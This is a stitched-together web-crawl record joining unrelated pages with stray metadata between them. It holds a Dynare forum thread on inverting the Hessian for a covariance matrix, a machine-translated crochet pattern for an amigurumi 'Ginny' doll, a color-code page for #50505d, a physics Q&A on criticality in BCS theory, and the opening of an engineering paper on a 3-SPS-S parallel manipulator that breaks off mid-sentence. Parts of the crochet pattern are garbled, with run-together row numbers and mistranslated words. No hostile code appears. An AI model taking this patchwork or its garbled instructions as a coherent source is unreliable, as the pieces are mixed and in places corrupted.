"# How to get asymptotic covariance matrix\n\nHi,\n\nI want to get an asymptotic covariance at mode.\n\nI know that dynare stores the hessian(hh) in a file called MODEL_FILENAME_mode.mat.\n\nTo get an asymptotic covariance at mode, which way should I do afteropening mode file.mat?\n\n1. inv(hh)\n\n2. inv(-hh)\n\n3. hh\n\n4. what else\n\nDynare uses\n\n``` invhess = inv(hh); stdh = sqrt(diag(invhess)); oo_.posterior.optimization.Variance = invhess; ```\nThe minus is not necessary, because the Hessian was computed on minus the log-likelihood function.\n\nHi\n\nshouldn’t that be\n\ninvhess = inv(hh./T)\n\nwhere T is the sample size?\n\nNope, I was actually wrong and inv(hh) is correct."
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.8907895,"math_prob":0.9012597,"size":615,"snap":"2023-14-2023-23","text_gpt3_token_len":175,"char_repetition_ratio":0.10801964,"word_repetition_ratio":0.021052632,"special_character_ratio":0.24390244,"punctuation_ratio":0.15748031,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9517548,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-03-24T05:57:04Z\",\"WARC-Record-ID\":\"<urn:uuid:92be2719-fdfb-4a07-b5f8-f38b2dcb917b>\",\"Content-Length\":\"19806\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:1424fbd2-c8c0-42d6-9bf9-070d2234068e>\",\"WARC-Concurrent-To\":\"<urn:uuid:7fd1aac9-9e53-4bec-8d6d-c4e4fd862cb7>\",\"WARC-IP-Address\":\"217.70.189.83\",\"WARC-Target-URI\":\"https://forum.dynare.org/t/how-to-get-asymptotic-covariance-matrix/5759\",\"WARC-Payload-Digest\":\"sha1:Z36JCVKTDNS2MB4TRY5GPQZNMBK5AMWH\",\"WARC-Block-Digest\":\"sha1:IBFQFWREY6JSSMM4IALHYTPKLRSLQQ7I\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-14/CC-MAIN-2023-14_segments_1679296945248.28_warc_CC-MAIN-20230324051147-20230324081147-00568.warc.gz\"}"} |
https://crochetfree.msa.plus/amigurumi-ginny-free-crochet-pattern/ | [
"# Amigurumi Ginny Free Crochet Pattern",
null,
"We continue to bring together the most beautiful amigurumi patterns related to Amigurumi. In this article you are waiting for a of amigurumi ginny pattern.\n\nGinny\n\nLegend\n\nch – chain\n\nsl-st – slip stich\n\nsc – single crochet\n\nhdc – half crochet\n\ndc – double crochet\n\ninc – increase\n\ndec – decrease\n\n3in1 – increase (3 columns in 1 loop of the previous row)\n\n1 of 3 – decrease (from 3 loops of the previous row, connect sc with the common top)\n\nI crocheted 1.3 mm, picked up the threads under the hook, the blue was cotton from the Semenovskaya Yarn company, white, black and yellow were from another manufacturer, a little thinner (not significantly)\n\nIn the process of creation, I was guided by previously drawn projections:\n\n1. Knit with a blue thread 6 ch in the amigurumi ring = 6\n\n2.6 inc = 12\n\n3. (1 + inc) * 6 = 18\n\n4. (2 + inc) * 6 = 24\n\n5. (3 + inc) * 6 = 30\n\n6. (4 + inc) * 6 = 36\n\n7. (5 + inc) * 6 = 42\n\n8. (6 + inc) * 6 = 48\n\n9. (7 + inc) * 6 = 54\n\n10. (8 + inc) * 6 = 60\n\n11. (9 + inc) * 6 = 66\n\n12. (10 + inc) * 6 = 72\n\n13. (11 + inc) * 6 = 78\n\n14. (12 + inc) * 6 = 84\n\n15. (13 + inc) * 6 = 90\n\n16. (14 + inc) * 6 = 96\n\n17. (15 + inc) * 6 = 102\n\n18. (33 + inc * 3 = 105\n\n19.17 + inc + (34 + inc) * 2 + 17 = 108\n\n20-23. = 108 (in the 23rd row, added a marker at the beginning of the row)\n\nHereinafter, about the rows in which to start stuffing, as well as about the density of stuffing, I do not describe, do everything based on the density of the knit product, filler, and the convenience of the knitter\n\n24. Knit on the legs of the columns of the previous row (as if perpendicular to the previous row, the base of the columns should be on the inside of the product), to form a protrusion of the lower jaw\n\n(7 + dec) * 8 + sl-st = 64 (break the thread)\n\n25. Attach the blue thread to the 17th loop from the beginning of the previous row, knit in the usual way\n\n6 + dec + 14 + dec + 8 + sl-st = 30 (break the thread)\n\n26. In this row and further several rows will alternate blue and white thread. I recommend to break off each time and attach another, it was easier for me. Attach the blue thread to the beginning of the row, which is marked with a marker. Knit on the legs of the columns of the previous row (as in the 24th row, only the base of the columns should be on the outside of the product)\n\n7 blue + 46 white + 9 blue\n\nNext, go to knitting in the usual way 36 blue columns (hereinafter – blue thread, b. – white thread)\n\n27.3g. + {(6 + dec) * 2 + 20 + dec + 7 + dec + 6} b. + (11 + dec + 20 + dec + 6) g. = 91\n\n28.3g. + (9 + dec + 10 + dec + 19 + dec + 9) b. + (8 + dec + 20 + dec + 5) y. = 88\n\n29.1 g + (1 + dec + 10 + dec + 23 + dec + 10 + dec + 2) b. + (7 + dec +15 + dec + 7) g. = 82\n\n30. (1 of 3 + 46 + 1 of 3) b. + 31 g. = 79\n\n31. (8 + dec + 28 + dec + 8) b. + (6 + dec + 15 + dec + 6) g. = 75\n\n32. Knit as in the 24th row (to form the protrusion of the lower teeth)\n\n{9 + dec + (2 + dec + [4 + dec] * 3 + 2) hdc + dec + 9} b. +\n\nknit in the usual way + (3 + dec + 3 + dec + 9 + dec + 3 + dec + 3) g. = 65\n\n33. Knit as in the 26th row 40 b. + in the usual way (4 + dec +12 + dec + 4) g. = 62\n\n34.40 b. + 22 g. = 62\n\n35. (1 of 3 + 34 + 1 of 3) b. + 22 g. = 58\n\n36. (dec + 9 + dec + 10 + dec + 9 + dec) b. + 22 g. = 54\n\n37.32 b. + 22 g. = 54\n\n38.10 b. + 12 g. For the front wall + 10 b. +22 g. = 54\n\n39. Knit on the front wall (from now on only blue thread) = 54\n\n40. = 54\n\nFurther cheek formation\n\n41.4sc + 2hdc + 1dc + 5v1dc + 1dc + 3hdc + 2sc + 4sl-st +\n\n+ 2sc + 3hdc + 1dc + 5v1dc + 1dc + 2hdc + 4sc + sl-st (break the thread)\n\n42. Start at the usual beginning of the row (where is the marker)\n\n4sc + 2hdc + 7dc + 3hdc + 8sc + 3hdc + 7dc + 2hdc + 4sc + 22sc = 62\n\n43.4sc + 2hdc + 1dc + 1 out of 5dc + 1dc + 3hdc + 2sc + 4sl-st +\n\n+ 2sc + 3hdc + 1dc + 1 out of 5dc + 1dc + 2hdc + 4sc + sl-st\n\n44. Start from the usual beginning of the row (where the marker) = 54sc\n\nCheek formation complete\n\n45. (17 + inc) * 3 = 57\n\n46. (18 + inc) * 3 = 60\n\n47. (19 + inc) * 3 = 63\n\n48. (20 + inc) * 3 = 66 (from the inside of the product make eye braces near the nose)\n\n49. (10 + inc) * 6 = 72 (from the inside of the product make eye braces on the side of the temples)\n\n50. (23 + inc) * 3 = 75\n\n51.1 + inc + 36 + inc + 6 + inc + 21 + inc + 5 = 77\n\n52. inc + 39 + inc + 6 + inc + 22 + inc + 6 = 81\n\n53. 46 + inc + 20 + inc + 10 + inc + 2 = 84 (in this or the next row, repeat the weights as in row 48)\n\n54-55. = 84\n\n56.16 + inc + 1 + inc + 9 + inc + 1 + inc + 53 = 88\n\n57.17 + inc + 1 + inc + 11 + inc + 1 + inc + 54 = 92\n\n58.2 + dec + 54 + dec + 6 + dec + 18 + dec + 4 = 88\n\n59. = 88\n\n60. Make 4 decreases in a row = 84\n\n61. = 84\n\n62. 14sc + 2hdc + 4dc + 2hdc + 9sc + 2hdc + 4dc + 2hdc + 45 = 84 (eyebrow shaping)\n\n63.14 + 4dec + 2 + dec + 1 + dec + 2 + 4dec + 45 = 74\n\n64.14 + 2dec + 1 + dec + 1 + dec + 1 + 2dec + 45 = 68\n\n65. (15 + dec) * 4 = 64\n\n66. (14 + dec) * 4 = 60\n\n67. (8 + dec) * 6 = 54\n\n68. (7 + dec) * 6 = 48\n\n69. (6 + dec) * 6 = 42\n\n70. (5 + dec) * 6 = 36\n\n71. (4 + dec) * 6 = 30\n\n72. (3 + dec) * 6 = 24\n\n73. (2 + dec) * 6 = 18\n\n74. (1 + dec) * 6 = 12\n\n75. 6 decreases, tighten the hole, cut the thread.\n\nDraw a black thread around the perimeter of the mouth. I made a seam\n\nEyes (2 pcs.)\n\n1. Knit with a white thread 6 ch in the ring amigurumi = 6\n\n2.6 inc = 12\n\n3. (1 + inc) * 6 = 18\n\n4. (2 + inc) * 6 = 24\n\n5-11 = 24\n\n12. (2 + dec) * 6 = 18\n\n13. (1 + dec ) * 6 = 12\n\n14. 6 decreases, tighten the hole, cut the thread.\n\nDo not stuff. Fold the part in half, on the convex part, make the pupil a black thread. Sew the eye to the orbit around the perimeter of the oval, filling as necessary the space between the eye and the orbit\n\nNose\n\n1. Knit with a blue thread 6 ch in the amigurumi ring = 6\n\n2. (1 + inc) * 3 = 9\n\n3. (2 + inc) * 3 = 12\n\n4.5 + 3inc + 4 = 15\n\n5.5sc + 1hdc + 4dc + 1hdc + 4sc = 15\n\n6.5sc + 1hdc + 4dc + 1hdc + 4sc = 15\n\n7.5.5sc + 6hdc + 4sc = 15\n\n8-9. = 15\n\n10.3inc + 4 + 3dec + 2 = 15\n\nCut a long thread, sew the nose to the face\n\nEar (2 pcs.)\n\n1. Knit with a blue thread 6 ch in the amigurumi ring = 6\n\n2.6 inc = 12\n\n3. (1 + inc) * 6 = 18\n\n4. (2 + inc) * 6 = 24\n\n5. (3 + inc) * 6 = 30\n\n6-14. = 30\n\n15. (8 + dec) * 3 = 27\n\n16. = 27\n\n17. (7 + dec) * 3 = 24\n\n18. = 24\n\n19. (6 + dec) * 3 = 21\n\n20-21. = 21\n\n22. (5 + dec) * 3 = 18\n\n23-24. = 18\n\n25. (4 + dec) * 3 = 15\n\n26-27. = 15\n\n28. (3 + dec) * 3 = 12\n\n29-30. = 12\n\n31. (2 + dec) * 3 = 9\n\n32-33. = 9\n\n34. (1 + dec) * 3 = 6\n\n35-36. = 6\n\nOpen the hole, cut the thread. Sew on your ears after a beard (so that the beard starts under the ear)\n\nBeard\n\n1. Knit in black thread 13 ch\n\n2.2sc in the 2nd loop from the hook + 7inc + 1sc + inc + 1sc = 20\n\n3.1 ch + 1sc to the root of the last sc of the previous row + 2sc to the base of the last sc of the previous row\n\n4.1 ch, turn, 2 + inc = 4\n\n5.1 ch, turn, inc + 2 + inc = 6\n\n6. 45 ch\n\n7.2 ch, hook in the 3rd loop, 45hdc + 6sc\n\n8.45 ch\n\n9.2 ch, hook in the 3rd loop, 45hdc + sl-st in the base of the 7th row sc\n\nCut a long thread, sew a beard\n\nEarring\n\n1. Knit yellow thread 24 ch\n\n2.1 ch, hook to the 2nd, (3 + inc) * 6 = 30\n\n3.1 ch, turn, 30sc\n\n4.1 ch, turn, (3 + dec) * 6 = 24\n\nIn the resulting strip, sew wide sides together (on which 24 loops). Sew the serge to one ear. Sew the ears to the head (earlobe attached at about the same place where the beginning of the beard was attached)\n\nEyebrow 1 (1 pc.)\n\n1. Knit in black thread 13 ch\n\n2.1 ch + 1sc in the 2nd item + 1hdc + (2dc in 1p.) * 4 + 1dc + 2hdc in 1p. + 2hdc +\n\n+ 2sc in 1p. + 2sc = 19\n\n3.1 ch, turn, behind the front wall 2sc + 1 out of 2 sc + 2hdc + 1 out of 2 hdc + 1dc +\n\n+ (1 of 2 dc) * 4 + 1hdc + 1sc = 13\n\nEyebrow 2 (1 pc.)\n\n1. Black thread, knit 13 ch\n\n2.1 ch + 2sc + 2sc in 1p. + 2hdc + 2hdc in 1p. + 1dc + (2dc in 1p.) * 4 + 1hdc + 1sc = 19\n\n3.1 ch, turn, behind the front wall 1sc + 1hdc + (1 of 2 dc) * 4 + 1dc +\n\n+ 1 out of 2 hdc + 2hdc + 1 out of 2 sc + 2sc = 13\n\nSew both eyebrows to the brow arches of the face\n\nHair\n\n1. Knit with a black thread 6 ch in the amigurumi ring = 6 (then without counting the loops in each circle, just knit the specified number of loops in a spiral, without the beginning / end of the circle)\n\n2. (5 + inc) * 5\n\n3. = 36 sc\n\n4. (2 + inc) * 3\n\n5. = 120 sc\n\n6.3 + 3dec + 3\n\n7. Fold the part in half so that the tail becomes flat, while 3 decreases of the last row should be located in the middle. Fold again so that 3 decreases of the last row are outside (it should turn out as in the picture below). Knit a circle of 6 loops on the outer loops\n\nKnit the second element illogically from 1 to 3 rows, then skip 4 and 5, immediately knit 6 row.\n\nNow put a small part in poplars, put a large part in the resulting hollow (like this: >>). Tie them together on the outer loops (I got 11 loops).\n\nContinue as one, as follows:\n\n1. = 11\n\n2. = 11\n\n3. dec + 3 + dec + 4 = 9\n\n4. = 9\n\n5. dec + 2 + dec + 3 = 7\n\nCut the thread. Sew the inner sides of the elements together so that they do not fall apart.\n\nRinglet on hair\n\n1. Knit with a yellow thread 18 ch, connect into a ring\n\n2.18 sc\n\n3. (1 + dec) * 6 = 12\n\n4. (1 + inc) * 6 = 18\n\nSew together 1 and 4 rows. Sew a ring to the base of the hair (so that it holds tightly to one another). Sew the entire structure to the head\n\nDone:",
null,
"Copy Protected by Chetan's WP-Copyprotect."
] | [
null,
"data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==",
null,
"data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.78791285,"math_prob":0.9999043,"size":9047,"snap":"2020-45-2020-50","text_gpt3_token_len":3729,"char_repetition_ratio":0.2060157,"word_repetition_ratio":0.20274325,"special_character_ratio":0.48634908,"punctuation_ratio":0.1272217,"nsfw_num_words":2,"has_unicode_error":false,"math_prob_llama3":0.99401253,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-24T23:16:35Z\",\"WARC-Record-ID\":\"<urn:uuid:8218cf85-b25d-4565-8032-dfa288a136d7>\",\"Content-Length\":\"97441\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b11a156d-4d39-4ff9-a87a-fa2defe9ba39>\",\"WARC-Concurrent-To\":\"<urn:uuid:fbf00031-1aee-48e5-99a0-77fb10e08df8>\",\"WARC-IP-Address\":\"104.28.16.205\",\"WARC-Target-URI\":\"https://crochetfree.msa.plus/amigurumi-ginny-free-crochet-pattern/\",\"WARC-Payload-Digest\":\"sha1:EXIOZNW53BLLQ5TPSMJ2INKJMH3KF6FV\",\"WARC-Block-Digest\":\"sha1:C3OOOYAV4JYST7LFRNPPYKPFN7SBNDVO\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107885059.50_warc_CC-MAIN-20201024223210-20201025013210-00684.warc.gz\"}"} |
https://physics.stackexchange.com/questions/220916/criticality-in-bcs-theory/220935#220935 | [
"# Criticality in BCS Theory\n\nCan someone provide me with a pedagogical introduction into the role of criticality in BCS theory?\n\nThe QCD condensate is due to strong coupling. The BCS condensation involves only weak coupling - nevertheless we get a condensate. As far as I know, this can only happen if our model involves criticality. How exactly does the formation of the condensate work, and which parameters play a crucial role?\n\n• I'm not sure exactly what you are asking. But one reason that Cooper pairing is possible with arbitrarily weak attractive interactions is that limiting dynamics to the Fermi surface effectively reduces the dimensionality of the problem. You may enjoy this blog post: thiscondensedlife.wordpress.com/2015/10/27/… Nov 27 '15 at 23:19\n• Thanks a lot for this great link, that illuminates a very interesting and important aspect of BCS theory! Nov 30 '15 at 14:39\n• @Rococo It would be great if you could define what you mean by criticality. Dec 5 '15 at 18:48\n• @MengCheng It would be great if you could define what you mean by criticality. Dec 5 '15 at 18:48\n• @LCF It would be great if you could define what you mean by criticality. Dec 5 '15 at 18:49\n\nBCS theory deals with superconductivity in a metal, or basically a finite density of non-interacting fermions. There is a Fermi surface with tons of gapless particle-hole excitations, so you can say it is critical. As long as the Fermi surface has certain symmetry (time-reversal or inversion), the pairing instability is infinitesimal, meaning that the condensate forms for arbitrarily small attractive interaction.\n\nTo be more concrete, a simplified model which nevertheless captures the essence of the BCS theory is the following:\n\n$H=\\sum_k \\xi_k c_{k}^\\dagger c_k+ g\\sum_{k,k'}c_{k\\uparrow}^\\dagger c_{-k\\downarrow}^\\dagger c_{-k'\\downarrow}c_{k'\\uparrow}$\n\nHere $\\xi_k$ is the single-particle spectrum of the fermions. The transition temperature is given by $T_c\\sim e^{-\\frac{1}{g\\nu}}$, where $\\nu$ is the density of states at Fermi surface.\n\n• In what sense does a Fermi surface with \"tons of gapless particle-hole excitations\" imply criticality? Nov 27 '15 at 23:19\n• OK, I'm not exactly sure what you mean by criticality. It's a gapless system, but not \"critical\" in the same way as Dirac fermions since it has \"more\" gapless excitations and there is a length scale, the Fermi wavelength determined by the fermion density. Nov 27 '15 at 23:33\n• You're not sure what I mean by criticality? I don't understand. You are the one who used that terminology in your answer. What did you mean by it? Nov 28 '15 at 4:23\n• It's a Fermi surface, so whatever you mean by criticality, whether it is the same as my understanding or not, just compare it with what happens with a Fermi surface. Nov 28 '15 at 4:37\n• Thanks for your answer and comments. However, I agree to Rococo's first question and would like to ask Meng Cheng what physical requirements a system needs to fulfill in order to obtain criticality? Nov 30 '15 at 14:41"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.8557804,"math_prob":0.8891572,"size":846,"snap":"2021-43-2021-49","text_gpt3_token_len":223,"char_repetition_ratio":0.10332542,"word_repetition_ratio":0.0,"special_character_ratio":0.23286052,"punctuation_ratio":0.084415585,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9753124,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-26T17:29:53Z\",\"WARC-Record-ID\":\"<urn:uuid:20740a03-cbd0-41d5-938f-7c1646145e70>\",\"Content-Length\":\"176256\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:2592a625-fc99-4973-b882-b5780754fa5e>\",\"WARC-Concurrent-To\":\"<urn:uuid:43542019-3051-4b3b-acdd-648f86bd39fe>\",\"WARC-IP-Address\":\"151.101.65.69\",\"WARC-Target-URI\":\"https://physics.stackexchange.com/questions/220916/criticality-in-bcs-theory/220935#220935\",\"WARC-Payload-Digest\":\"sha1:2NASMI5NZTW2KHLQWDEZCVKF4G5A3YF4\",\"WARC-Block-Digest\":\"sha1:ZCIX24P6MR4PQ4XYH3W4JQQL4Y3DAOJE\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323587915.41_warc_CC-MAIN-20211026165817-20211026195817-00695.warc.gz\"}"} |
https://www.colorhexa.com/50505d | [
"# #50505d Color Information\n\nIn a RGB color space, hex #50505d is composed of 31.4% red, 31.4% green and 36.5% blue. Whereas in a CMYK color space, it is composed of 14% cyan, 14% magenta, 0% yellow and 63.5% black. It has a hue angle of 240 degrees, a saturation of 7.5% and a lightness of 33.9%. #50505d color hex could be obtained by blending #a0a0ba with #000000. Closest websafe color is: #666666.\n\n• R 31\n• G 31\n• B 36\nRGB color chart\n• C 14\n• M 14\n• Y 0\n• K 64\nCMYK color chart\n\n#50505d color description : Very dark grayish blue.\n\n# #50505d Color Conversion\n\nThe hexadecimal color #50505d has RGB values of R:80, G:80, B:93 and CMYK values of C:0.14, M:0.14, Y:0, K:0.64. Its decimal value is 5263453.\n\nHex triplet RGB Decimal 50505d `#50505d` 80, 80, 93 `rgb(80,80,93)` 31.4, 31.4, 36.5 `rgb(31.4%,31.4%,36.5%)` 14, 14, 0, 64 240°, 7.5, 33.9 `hsl(240,7.5%,33.9%)` 240°, 14, 36.5 666666 `#666666`\nCIE-LAB 34.464, 2.989, -7.573 8.152, 8.233, 11.515 0.292, 0.295, 8.233 34.464, 8.142, 291.539 34.464, -0.729, -10.074 28.693, 0.502, -3.708 01010000, 01010000, 01011101\n\n# Color Schemes with #50505d\n\n• #50505d\n``#50505d` `rgb(80,80,93)``\n• #5d5d50\n``#5d5d50` `rgb(93,93,80)``\nComplementary Color\n• #50575d\n``#50575d` `rgb(80,87,93)``\n• #50505d\n``#50505d` `rgb(80,80,93)``\n• #57505d\n``#57505d` `rgb(87,80,93)``\nAnalogous Color\n• #575d50\n``#575d50` `rgb(87,93,80)``\n• #50505d\n``#50505d` `rgb(80,80,93)``\n• #5d5750\n``#5d5750` `rgb(93,87,80)``\nSplit Complementary Color\n• #505d50\n``#505d50` `rgb(80,93,80)``\n• #50505d\n``#50505d` `rgb(80,80,93)``\n• #5d5050\n``#5d5050` `rgb(93,80,80)``\n• #505d5d\n``#505d5d` `rgb(80,93,93)``\n• #50505d\n``#50505d` `rgb(80,80,93)``\n• #5d5050\n``#5d5050` `rgb(93,80,80)``\n• #5d5d50\n``#5d5d50` `rgb(93,93,80)``\n• #2d2d34\n``#2d2d34` `rgb(45,45,52)``\n• #383842\n``#383842` `rgb(56,56,66)``\n• #44444f\n``#44444f` `rgb(68,68,79)``\n• #50505d\n``#50505d` `rgb(80,80,93)``\n• #5c5c6b\n``#5c5c6b` `rgb(92,92,107)``\n• #686878\n``#686878` `rgb(104,104,120)``\n• #737386\n``#737386` `rgb(115,115,134)``\nMonochromatic Color\n\n# Alternatives to #50505d\n\nBelow, you can see some colors close to #50505d. Having a set of related colors can be useful if you need an inspirational alternative to your original color choice.\n\n• #50535d\n``#50535d` `rgb(80,83,93)``\n• #50525d\n``#50525d` `rgb(80,82,93)``\n• #50515d\n``#50515d` `rgb(80,81,93)``\n• #50505d\n``#50505d` `rgb(80,80,93)``\n• #51505d\n``#51505d` `rgb(81,80,93)``\n• #52505d\n``#52505d` `rgb(82,80,93)``\n• #53505d\n``#53505d` `rgb(83,80,93)``\nSimilar Colors\n\n# #50505d Preview\n\nThis text has a font color of #50505d.\n\n``<span style=\"color:#50505d;\">Text here</span>``\n#50505d background color\n\nThis paragraph has a background color of #50505d.\n\n``<p style=\"background-color:#50505d;\">Content here</p>``\n#50505d border color\n\nThis element has a border color of #50505d.\n\n``<div style=\"border:1px solid #50505d;\">Content here</div>``\nCSS codes\n``.text {color:#50505d;}``\n``.background {background-color:#50505d;}``\n``.border {border:1px solid #50505d;}``\n\n# Shades and Tints of #50505d\n\nA shade is achieved by adding black to any pure hue, while a tint is created by mixing white to any pure color. In this example, #070709 is the darkest color, while #fdfdfd is the lightest one.\n\n• #070709\n``#070709` `rgb(7,7,9)``\n• #111113\n``#111113` `rgb(17,17,19)``\n• #1a1a1e\n``#1a1a1e` `rgb(26,26,30)``\n• #232328\n``#232328` `rgb(35,35,40)``\n• #2c2c33\n``#2c2c33` `rgb(44,44,51)``\n• #35353d\n``#35353d` `rgb(53,53,61)``\n• #3e3e48\n``#3e3e48` `rgb(62,62,72)``\n• #474752\n``#474752` `rgb(71,71,82)``\n• #50505d\n``#50505d` `rgb(80,80,93)``\n• #595968\n``#595968` `rgb(89,89,104)``\n• #626272\n``#626272` `rgb(98,98,114)``\n• #6b6b7d\n``#6b6b7d` `rgb(107,107,125)``\n• #747487\n``#747487` `rgb(116,116,135)``\n• #7f7f91\n``#7f7f91` `rgb(127,127,145)``\n• #89899a\n``#89899a` `rgb(137,137,154)``\n• #9494a3\n``#9494a3` `rgb(148,148,163)``\n• #9e9eac\n``#9e9eac` `rgb(158,158,172)``\n• #a9a9b5\n``#a9a9b5` `rgb(169,169,181)``\n• #b3b3be\n``#b3b3be` `rgb(179,179,190)``\n• #bebec7\n``#bebec7` `rgb(190,190,199)``\n• #c8c8d0\n``#c8c8d0` `rgb(200,200,208)``\n• #d3d3d9\n``#d3d3d9` `rgb(211,211,217)``\n• #dddde2\n``#dddde2` `rgb(221,221,226)``\n• #e8e8eb\n``#e8e8eb` `rgb(232,232,235)``\n• #f3f3f4\n``#f3f3f4` `rgb(243,243,244)``\n• #fdfdfd\n``#fdfdfd` `rgb(253,253,253)``\nTint Color Variation\n\n# Tones of #50505d\n\nA tone is produced by adding gray to any pure hue. In this case, #50505d is the less saturated color, while #0000ad is the most saturated one.\n\n• #50505d\n``#50505d` `rgb(80,80,93)``\n• #494964\n``#494964` `rgb(73,73,100)``\n• #43436a\n``#43436a` `rgb(67,67,106)``\n• #3c3c71\n``#3c3c71` `rgb(60,60,113)``\n• #353578\n``#353578` `rgb(53,53,120)``\n• #2f2f7e\n``#2f2f7e` `rgb(47,47,126)``\n• #282885\n``#282885` `rgb(40,40,133)``\n• #21218c\n``#21218c` `rgb(33,33,140)``\n• #1b1b92\n``#1b1b92` `rgb(27,27,146)``\n• #141499\n``#141499` `rgb(20,20,153)``\n• #0d0da0\n``#0d0da0` `rgb(13,13,160)``\n• #0707a6\n``#0707a6` `rgb(7,7,166)``\n``#0000ad` `rgb(0,0,173)``\nTone Color Variation\n\n# Color Blindness Simulator\n\nBelow, you can see how #50505d is perceived by people affected by a color vision deficiency. This can be useful if you need to ensure your color combinations are accessible to color-blind users.\n\nMonochromacy\n• Achromatopsia 0.005% of the population\n• Atypical Achromatopsia 0.001% of the population\nDichromacy\n• Protanopia 1% of men\n• Deuteranopia 1% of men\n• Tritanopia 0.001% of the population\nTrichromacy\n• Protanomaly 1% of men, 0.01% of women\n• Deuteranomaly 6% of men, 0.4% of women\n• Tritanomaly 0.01% of the population"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.5431165,"math_prob":0.8046201,"size":3677,"snap":"2021-31-2021-39","text_gpt3_token_len":1635,"char_repetition_ratio":0.123332426,"word_repetition_ratio":0.007380074,"special_character_ratio":0.56758225,"punctuation_ratio":0.23344557,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99295723,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-09-21T23:13:04Z\",\"WARC-Record-ID\":\"<urn:uuid:349a15ee-6e34-43e0-b3e0-e7c3b2f19aa7>\",\"Content-Length\":\"36117\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a1691972-0856-4672-b8aa-9b1191913cfd>\",\"WARC-Concurrent-To\":\"<urn:uuid:77cb7f91-d6e6-452d-92e9-4273494eb919>\",\"WARC-IP-Address\":\"178.32.117.56\",\"WARC-Target-URI\":\"https://www.colorhexa.com/50505d\",\"WARC-Payload-Digest\":\"sha1:FQCAQAGKONJGOP4VRAEO7JKGJZ6VTPIN\",\"WARC-Block-Digest\":\"sha1:U4GVTLN4EOWQU6VWSUKWJQZ67HQRU7NH\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-39/CC-MAIN-2021-39_segments_1631780057274.97_warc_CC-MAIN-20210921221605-20210922011605-00319.warc.gz\"}"} |
https://1library.net/document/q77930kq-dimensional-synthesis-spatial-orientation-parallel-manipulator-characterizing-configuration.html | [
"# Dimensional Synthesis of a Spatial Orientation 3-DoF Parallel Manipulator by Characterizing the Configuration Space\n\nLoading....\n\nLoading....\n\nLoading....\n\nLoading....\n\nLoading....\n\n## Full text\n\n(1)\n\n### the Configuration Space\n\nM. Ur´ızar, V. Petuya, M. Diez, and A. Hern´andez\n\nAbstract In this paper the authors approach the dimensional synthesis of paral-lel manipulators focusing on the evaluation of important entities belonging to the configuration space, such as workspace and joint space. In particular, 3-DoF ma-nipulators that can perform non-singular transitions are considered, illustrating the procedure with a case study. The target is to search for designs that achieve the goals of adequate size and shape of the workspace.\n\nKey words: Parallel manipulator, Configuration space, Dimensional Synthesis.\n\n### 1 Introduction\n\nIn the design process of parallel manipulators several criteria have been presented in the literature for evaluating which architecture is best. Designers often search for the optimum design parameters such that certain important requirements are achieved. From the kinematic point of view, optimal design methodologies are principally focused on: workspace [6, 8, 2], kinematic performance indices [3, 1], task develop-ment , etc. Features such as workspace and dexterity can be emphasized as two significant considerations [5, 1], because parallel manipulators have relative smaller workspaces and complex singularities compared to their serial counterparts.\n\nThe analysis of the singularity loci, together with the distribution of the Di-rect Kinematic Problem (DKP) solutions over the workspace, has received a lot of attention during the last years. In this field, the phenomenon ofassembly mode change, also known asnon-singular solution change, has been extensively studied [11, 4, 10]. It consists in analyzing how the transitions between different DKP so-lutions can be made in a safety and controlled way. Manipulators presenting this\n\nM. Ur´ızar, V. Petuya, M. Diez and A. Hern´andez\n\nUniversity of the Basque Country, Faculty of Engineering in Bilbao, Mechanical Engineering Dpt. Alameda de Urquijo s/n, 48013 Bilbao (Spain), e-mail: [email protected]\n\n1\n\n## Author's version\n\n(2)\n\nability can enlarge their range of motion, as they have access to all the regions asso-ciated with the solutions involved in the transition. However, it must be emphasized that, usually, not all the designs of the same manipulator own this ability.\n\nIn this paper, the dimensional synthesis of this type of manipulators is ap-proached by characterizing entities of the configuration space, such as workspace and joint space. For three-degree-of-freedom parallel manipulators these entities that can be represented in a three-dimensional space. So as to show the procedure the spatial orientation 3-SPS-S parallel manipulator is used as an illustrative exam-ple. This manipulator has a broad range of applications, such as: orienting a tool or a workpiece, solar panels, space antennas, camera devices, human wrist prosthesis, haptic devices, etc. The purpose is to analyze several designs, assessing the influ-ence of the design parameters on the resultant workspace and joint space. Then, the aim is to search for the set of possible designs that best satisfy the requirements of size and shape of the operational workspace.\n\n### 2 Case study: 3-SPS-S parallel manipulator\n\nThe spatial orientation 3-SPS-S parallel manipulator shown in Fig. 1a will be stud-ied. The 3-SPS-S manipulator is made up of a moving platformOB1B2B3, a base platformOA1A2A3, and three 